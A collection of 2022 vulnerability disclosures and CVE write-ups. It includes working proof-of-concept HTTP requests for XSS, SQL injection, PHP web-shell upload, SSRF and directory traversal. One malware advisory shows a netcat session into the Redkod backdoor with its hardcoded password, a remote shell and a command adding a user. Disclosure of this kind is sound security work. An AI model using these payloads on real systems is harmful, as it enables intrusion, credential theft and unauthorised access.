kkFileView 4.0 is vulnerable to Cross Site Scripting (XSS) via controller\ Filecontroller.java.

Permalink

**KkFileView has XSS vulnerability**

After visiting the Web page, KKfileview project first selects the browse button to add relevant files, and then clicks the upload button. The added file is a JSP file containing malicious JS statements. The contents of the file are as follows:

<html\>
<title\>test ip</title\>
<body\>
<script\>
alert('x')
</script\>
</body\>
</html\>

The request packet is as follows

    POST /fileUpload HTTP/1.1
    Host: 192.168.17.168:8012
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------199653466720897274883663154374
    Content-Length: 322
    Origin: http://192.168.17.168:8012
    DNT: 1
    Connection: close
    Referer: http://192.168.17.168:8012/index
    
    -----------------------------199653466720897274883663154374
    Content-Disposition: form-data; name="file"; filename="x.jsp"
    Content-Type: application/octet-stream
    
    <html>
    <title>test ip</title>
    <body>
    <script>
    alert('x')
    </script>
    </body>
    </html>
    
    -----------------------------199653466720897274883663154374--
    

Then view the address of the uploaded file under the file name address demo/x.jsp

The file can be accessed directly by concatenating the URL, and the malicious JS file can be executed

View the server\ src \main\ Java \cn\keking\web\controller\ Filecontroller.java

The reasons for this vulnerability are as follows:

1.  The fileUpload method determines only the file name but not the contents of the file
2.  The file upload path is not authenticated

CVE-2022-42147: paper/xss_vul_en.md at main · xiaojiangxl/paper

Open Source SACCO Management System v1.0 is vulnerable to SQL Injection via /sacco_shield/manage_payment.php.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: XD201-MENG@QI

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/manage\_payment.php

Vulnerability location: /sacco\_shield/manage\_payment.php?id=, id

dbname = sacco,length=5

\[+\] Payload: /sacco\_shield/manage\_payment.php?id=2%20and%20length(database())%20=5--+ // Leak place ---> id

GET /sacco\_shield/manage\_payment.php?id\=2%20and%20length(database())%20\=5\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

length=5 

length=6

CVE-2022-42143: bug_report/SQLi-1.md at main · xd201qaz/bug_report

Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: XD201-MENG@QI

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/update\_settings.php

Loophole location: Online Tours & Travels management system's admin/settings.php file exists arbitrary file upload (RCE)

Request package for file upload:

POST /tour/admin/operations/update\_settings.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/settings.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------248921847826758
Content-Length: 1288
\-----------------------------248921847826758
Content-Disposition: form-data; name="title"
Tours and Travels
\-----------------------------248921847826758
Content-Disposition: form-data; name="f\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img"
favi.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="logo\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img1"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img2"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="currency"
1
\-----------------------------248921847826758
Content-Disposition: form-data; name="footer"
Nikhil B
\-----------------------------248921847826758
Content-Disposition: form-data; name="update"
\-----------------------------248921847826758--

The files will be uploaded to this directory \\tour\\admin\\settings 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42142: bug_report/RCE-1.md at main · xd201qaz/bug_report

A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556.

NLOKSA1507

Software Updater of Avira Security for Windows vulnerable to Privilege Escalation

Advisory Status

CLOSED

Summary

NortonLifeLock has released an update to address an issue that was discovered in the software updater functionality of Avira Security.

Affected Products

"Avira Security" – for Windows; up to version 1.1.71.30554

Issues

**Mitigation**

Upgrade Avira Security for Windows to version 1.1.72.30556. This version was released on 15. August 2022 to all customers. All users received the update automatically and do not need to take any action.

**Acknowledgements**

Filip Dragovic

CVE-2022-3368

 

Severity/CVSSv3

High  
Score: 7.3  
Vector: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

References

Filip Dragovic

Impact

Privilege Escalation

Description

A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556.

Additional Recommendations, if any:

We encourage customers to ensure their security software – as well as their tech devices – are always updated to the latest version available.

NLOKSA1506

Avira Password Manager-Browser Extensions vulnerable to Sensitive Data Leakage via Phishing

Advisory Status

CLOSED

Summary

NortonLifeLock has released an update to address an issue that was discovered in Avira Password Manager Browser Extension

Affected Products

Only the following software is affected:  

*   "Avira Password Manager" - extension for Chrome; version 2.18.4.3868
*   "Avira Password Manager" - extension for MS Edge; version 2.18.4.3847
*   "Avira Password Manager" - extension for Opera; version 2.18.4.3847
*   "Avira Password Manager" - extension for Firefox; version 2.18.4.38471
*   "Avira Password Manager" - extension for Safari; version 2.18.4

Issues

**Mitigation**

Upgrade extensions to following versions:

*   "Avira Password Manager" - extension for Chrome; version 2.18.5.3877
*   "Avira Password Manager" - extension for MS Edge; version 2.18.5.3877
*   "Avira Password Manager" - extension for Opera; version 2.18.5.3877
*   "Avira Password Manager" - extension for Firefox; version 2.18.5.38771
*   "Avira Password Manager" - extension for Safari; version 2.18.5 (3877)

Users who have not disabled auto-updates receive the updated versions automatically and do not need to take any action

**Acknowledgements**

Stiftung Warentest

CVE-2022-28795

 

Severity/CVSSv3

Critical  
Score: 9.6  
Vector: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

References

https://nvd.nist.gov/vuln/detail/CVE-2022-28795

Impact

Sensitive Data Leakage

Description

A vulnerability within the Avira Password Manager Browser Extensions provided a potential loophole where, if a user visited a page crafted by an attacker, the discovered vulnerability could trigger the Password Manager Extension to fill in the password field automatically. An attacker could then access this information via JavaScript. The issue was fixed with the browser extensions version 2.18.5 for Chrome, MS Edge, Opera, Firefox, and Safari.

Additional Recommendations, if any:

We encourage customers to ensure their security software - as well as their tech devices - are always updated to the latest version available. In addition, we encourage users to use two-factor (2FA) authentication as an additional layer of security.

CVE-2022-3368: Norton Security Advisories

An attacker can pre-create the `/Applications/Google\ Drive.app/Contents/MacOS` directory which is expected to be owned by root to be owned by a non-root user. When the Drive for Desktop installer is run for the first time, it will place a binary in that directory with execute permissions and set its setuid bit. Since the attacker owns the directory, the attacker can replace the binary with a symlink, causing the installer to set the setuid bit on the symlink. When the symlink is executed, it will run with root permissions. We recommend upgrading past version 64.0

CVE-2022-3421: Google Drive for desktop release notes

kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controller\OnlinePreviewController.java.

Permalink

Cannot retrieve contributors at this time

**KkFileView has SSRF vulnerabilities**

The server provides the function of obtaining data from other server applications without filtering or restricting addresses and protocols.

Set up the test environment as shown below

Set up kkFileView service on Server1 server and start HTTP service on port 90 of Server2 host

Server2 host Settings do not allow direct access from PC1 hosts

By accessing server1 http://ip:prot/onlinPreview?url=

The Intranet request address to be probed is base64 encoded and used as the URL parameter value for this request

**Related Request packets**

    GET /onlinePreview?url=aHR0cDovLzE5Mi4xNjguMTcuMTUzOjkwL2luZGV4Lmh0bWw= HTTP/1.1
    Host: 192.168.17.128:8012
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    

The contents of the Server2 host can be detected in the response package

You can also see Server1 requesting it in Server2's Web services log

120/5000 Check the server\src\main\java\cn\keking\web\controller\OnlinePreviewController.java OnlinePreview function in Java Here is not to the incoming base64 content filtering operation

CVE-2022-42149: paper/ssrf_vul_en.md at main · xiaojiangxl/paper

Jhead 3.06.0.1 allows attackers to execute arbitrary OS commands by placing them in a JPEG filename and then using the regeneration -rgt50 option.

CVE-2022-41751: jhead/jhead.c at 63ce118c6a59ea64ac357236a11a47aaf569d622 · Matthias-Wandel/jhead

Insufficiently Protected Credentials: An authenticated user with debug privileges can retrieve stored Nessus policy credentials from the “nessusd” process in cleartext via process dumping. The affected products are all versions of Nessus Essentials and Professional. The vulnerability allows an attacker to access credentials stored in Nessus scanners, potentially compromising its customers’ network of assets.

CSW experts have discovered a Zero Day vulnerability with medium severity in Tenable’s Nessus Professional scanner.  This bug has been identified as ‘Sensitive Information Disclosure’ and has been given the CVE identifier of CVE-2022-XXXX and has a severity score of 6.5 in CVSS V3. This vulnerability has been mapped to weakness enumeration CWE-522 (Insufficiently Protected Credentials).

**How this vulnerability could be exploited**

CVE-2022-XXXXX allows an attacker to access credentials stored in Nessus Scanners thus potentially compromising its customers' network of assets. An authenticated user with debug privileges can retrieve Nessus policy credentials from the ‘nessusd’ process in cleartext through process dumping and access sensitive information. This vulnerability affects all versions of Nessus Essentials and Professional.

**Proof of Concept**

We tested the following vulnerability on Tenable’s Nessus Professional 10.1.1 (#61) Windows.

1\. Install Nessus Essentials or Professional, log on to the scanner, and create a Nessus policy with credentials using any Credential Type (in our case, it is Windows).

  
**Figure 1**: Creating the Nessus Policy with the Windows Credential Type

2\. Run a credentialed scan using the created Nessus policy.

3\. Create a process dump file of the process ‘nessusd’ from the Windows Task Manager.

**Figure 2**: Creating the Process Dump of the “nessusd” Process

  
**Figure 3: Created the Process Dump of the “nessusd” Process**

4\. Parse the dump file (.DMP) using the Sysinternals tool “Strings” and extract information by extracting lines with the string “Login configurations.”

  
**Figure 4:** Parsing the DMP File Using Strings and Extracting Credentials

  
5\. The Nessus policy’s Windows Domain Credentials have been retrieved in cleartext and viewed using a text editor application.

  
Figure 5: The Nessus Policy-Stored Windows Credentials Retrieved in Cleartext

**Impact of the Vulnerability**

*   An attacker can retrieve stored credentials in Nessus Policies in cleartext from the “nessusd” process.
*   An attacker can potentially compromise corresponding assets, internal domains, and networks with the retrieved credentials.
*   With disclosed credentials, an attacker can potentially compromise its associated assets and networks of an organization leading to infiltration and breach.

**Timeline**

*   **April 25, 2022:** CSW Experts discovered CVE-2022-XXXX in Nessus Professional version 10.1.1 (#61)
*   **May 02, 2022**: Reported to Tenable’s team
*   **June 02, 2022**: Tenable proposed a potential fix in Nessus 10.4 or in a later release.
*   **August 04, 2022**: Tenable has deemed the reported vulnerability as an acceptable risk.
*   **August 31, 2022:** Tenable performed additional reviews and acknowledged there would be no fix for this issue.
*   **September 01, 2022**: Tenable has agreed to raise a CVE for this submission.

Never miss a patch or an update with CSW's Patch Watch Newsletter. Subscribe now!

**Secure your environment from cyber-attacks!**

Know How

CVE-2022-28291: CSW Expert Discovers a Zero Day Vulnerability in Tenable’s Nessus Scanner

Backdoor.Win32.Redkod.d malware suffers from a hardcoded credential vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022  
Original source: https://malvuln.com/advisory/bb309bdd071d5733efefe940a89fcbe8.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Redkod.d  
Vulnerability: Weak Hardcoded Credentials   
Description: The malware listens on TCP port 4820. Authentication is required, however the password "redkod" is weak and hardcoded in cleartext within the PE file.  
Family: Redkod  
Type: PE32  
MD5: bb309bdd071d5733efefe940a89fcbe8  
Vuln ID: MVID-2022-0649  
Disclosure: 10/16/2022

Exploit/PoC:  
C:\>nc64.exe x.x.x.x 4820  
===========================================================  
=                   RedKod Backdoor 1.0                   =  
=                        By R-e-D                         =  
=                  http://www.redkod.com                  =  
=                     r-e-d@redkod.com                    =  
===========================================================

Password: redkod

RBackdoor# exec calc  
msg: Execution effectuee avec succes

RBackdoor# setpass malvuln

RBackdoor# help  
COMMAND HELP:

 > Shell Commands :

CD          Permet de changer de repertoire courant  
CLEAR       Efface le buffer de la console  
COPY        Permet de copier un fichier  
DEL         Permet d'effacer un ou plusieurs fichier  
DIR         Permet de lister le contenu d'un repertoire  
FIND        Recherche un fichier a travers le path  
HELP        Affiche cette aide  
LS          Permet de lister le contenu d'un repertoire  
MD          Permet de creer un repertoire  
MOVE        Permet de deplacer un fichier ou un repertoire  
REN         Permet de renommer un fichier  
PWD         Permet de recuperer le repertoire courant  
RMDIR       Permet d'effacer un repertoire  
SHELL       Permet d'executer toute commande DOS sur le systeme cible

 > Informations Commands :

CLIP        Permet de recuperer le contenu du presse papier  
DISKINFO    Permet de recuperer des informations sur les disques durs  
GETGROUPS   Permet de recuperer des informations sur les groupes, les users, les            SID :)  
GETPROCESS  Recupere et affiche la liste des processus actifs  
GETSERVICES Permet d'afficher les services NT presents sur une machine local ou             distante  
LISTEVENT   Permet de lister les journaux du eventlog  
NETSHARE    Permer d'afficher les ressources partager de la machine local ou d'u            ne machine distante  
ENUMSERVER  Permet d'afficher les servers appartenant au domaine  
SYSINFO     Permet de recuperer des informations sur le systeme cible  
TIME        Affiche l'heure et la date du systeme distant  
UPTIME      Permet d'afficher depuis combien de temps le systeme fonctionne  
USERINFO    Permet d'obtenir des informations sur un utilisateur  
VERSION     Affiche la version de RBackdoor  
WHOAMI      Permet de recuperer l'utilisateur logge sur la machine

 > Interactions Commands :

ADDEVENT    Permet d'ajouter un evenement dans l'eventlog  
ADDSHARE    Permet d'ajouter une ressource partagee  
BEEP        Fait beeper le haut parleur interne  
CLEARLOG    Permet d'effacer un journal complet de l'eventlog  
DELSERVICE  Permet de supprimer un service present  
DELSHARE    Permet de retirer une ressource partagee  
EXEC        Permet d'executer une commande sur le systeme cible  
HEXEC       Permet d'executer une commande tout en cachant sa sortie  
LOGOFF      Permet de fermer la session de l'utilisateur courant  
KILLPROCESS Permet de killer un processus  
MOUSE       Permet de placer le curseur de la souris au coordonnees x et y                  voulues  
MSGBOX      Permet d'envoyer une boite de dialogue au systeme cible avec message            personalise  
RCHAT       Permet d'etablir une communication ecrite avec une personne etant pr            esent sur le pc distant  
REBOOT      Permet de redemarrer la machine  
SCREENSHOT  Permet de prendre un screenshot du bureau de la machine distante  
SENDKEY     Permet d'emuler la pression d'une touche du clavier  
SETNAME     Change le nom NetBios du serveur  
STARTSERVICE Permet de demarrer un servive present sur la machine serveur  
STOPSERVICE Permet de stopper un service present et demarrer

 > Administration of RBackdoor Commands :

EXIT        Permet de fermer la connection a la backdoor tout en laissant                   la backdoor active  
KILL        Permet de desactiver ou de reactiver la backdoor  
OPEN        Creer un nouveau processus de RBackdoor sur un autre port  
SETPASS     Permet de modifier le pass associe a la backdoor

 > RBackdoor Tools :

FGET        Permet de recuperer un fichier sur un serveur FTP  
FPUT        Permet d'uploader un fichier sur un serveur FTP  
MAIL        Permet d'envoyer un mail, etc...  
NETPATCH    Rootkit permettant de patcher netstat.exe pour cacher RBackdoor  
RCRYPT      Permet de crypter ou de decrypter un fichier  
RPATCH      Permet de patcher le systeme pour effacer rbackdoor  
RSHELL      Permet de lancer un vrai shell DOS  
SCAN        Permet de scanner les ports d'une hote distante  
TELNET      Permet de se connecter a une hote distante (TCP Protocol Only)  
VIEW        Permet de lire le contenu d'un fichier  
WGET        Recupere et d'affiche le contenu d'un fichier heberge sur un serveur            http  
WRITE       Permet d'ecrire directement dans un fichier

msg: Tapez help <command> pour des informations plus precises sur la commande voulue

RBackdoor# rshell  
                                 ATTENTION!!  
Pour fermer le shell veuillez tapez 'exit'! Sinon perte de la backdoor envisageable !

Microsoft Windows [Version 10.0.16299.309]  
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>whoami  
whoami  
desktop-2c4jqho\victim

C:\dump>net user hyp3rlinx 666 /add  
net user hyp3rlinx 666 /add  
The command completed successfully.

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Redkod.d MVID-2022-0649 Hardcoded Credential

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tag

#windows